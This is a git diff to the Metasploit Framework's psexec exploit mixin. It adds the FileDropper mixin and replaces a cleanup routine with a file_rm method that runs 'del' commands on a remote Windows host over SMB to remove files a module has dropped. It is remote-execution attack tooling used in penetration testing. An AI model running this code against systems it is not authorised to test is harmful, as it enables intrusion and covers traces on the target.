diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index e31a6a68c1..7e8b030564 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -12,6 +12,7 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB + include Msf::Exploit::FileDropper # Retrieves output from the executed command # @@ -47,7 +48,7 @@ module Exploit::Remote::Psexec # @param command [String] Should be a valid windows command # @return [Boolean] true if everything wen't well def psexec(command) - + print_status("#{peer} - Executing: #{command}") simple.connect("IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) @@ -157,34 +158,20 @@ module Exploit::Remote::Psexec return true end - # This is the cleanup method, removes .txt and .bat file/s created - # during execution - # - # @example - # cleanup_after("C$", rhost, '\WINDOWS\Temp\output.txt', 'C:\WINDOWS\Temp\batchfile.bat') - # - # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [String] IP address of remote host to connect to - # @param text [String] Path to the text file relative to the smbshare - # @param bat [String] Full path to the batch file created - # @return [StandarError] only in the event of an error - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command/s - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Make sure to manually remove files from the target.") - else - print_status("#{peer} - Cleanup was successful") - end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}") - print_error("#{peer} - Make sure to manually remove files from the target") - return cleanuperror - end - end + # This method is called by file_dropper to remove files droped + # By your module + # + # @example + # file_rm('C:\WINDOWS\Temp\output.txt') + # + # @param file [String] Full path to a file on the remote host + # @return [StandardError] only in the event of an error + def file_rm(file) + delete = "%COMSPEC% /C del #{file}" + print_status("#{peer} - Deleting #{file}") + psexec(delete) + print_status("#{peer} - Command Ran") + end # Make sure the cleanup command worked # This method should only be called from within cleanup_after